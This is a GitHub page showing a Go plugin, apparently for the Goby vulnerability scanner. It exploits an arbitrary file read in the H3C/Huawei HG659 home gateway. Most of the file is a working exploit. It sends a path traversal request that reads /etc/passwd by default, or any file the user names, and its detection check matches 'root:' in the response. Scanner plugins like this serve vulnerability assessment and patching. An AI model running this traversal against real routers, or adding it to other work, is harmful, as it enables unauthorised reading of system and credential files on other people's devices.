-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathH3C_HG659_lib_File_read.go
More file actions
88 lines (85 loc) · 2.35 KB
/
Copy pathH3C_HG659_lib_File_read.go
File metadata and controls
88 lines (85 loc) · 2.35 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
"regexp"
)
func init() {
expJson := `{
"Name": "H3C HG659 lib File Read",
"Description": "H3C HG659 is any file read, can read any file server",
"Product": "H3C HG659",
"Homepage": "https://www.huawei.com/",
"DisclosureDate": "2021-06-15",
"Author": "PeiQi",
"GobyQuery": "app=\"HuaWei-Home-Gateway\"",
"Level": "2",
"Impact": "<p>File read</p>",
"Recommendation": "Update",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "File",
"type": "input",
"value": "/etc/passwd"
}
],
"ScanSteps": [
"AND"
],
"ExploitSteps": null,
"Tags": [
"File read"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": [
"H3C HG659"
],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"Recommandation": "<p>undefined</p>"
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
uri := "/lib///....//....//....//....//....//....//....//....//etc//passwd"
cfg := httpclient.NewGetRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root:")
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
file := ss.Params["File"].(string)
file = strings.Replace(file, "/", "//", -1)
uri := "/lib///....//....//....//....//....//....//....//...." + file
cfg := httpclient.NewGetRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil {
if resp.StatusCode == 200 {
expResult.Output = resp.RawBody
expResult.Success = true
}
}
return expResult
},
))
}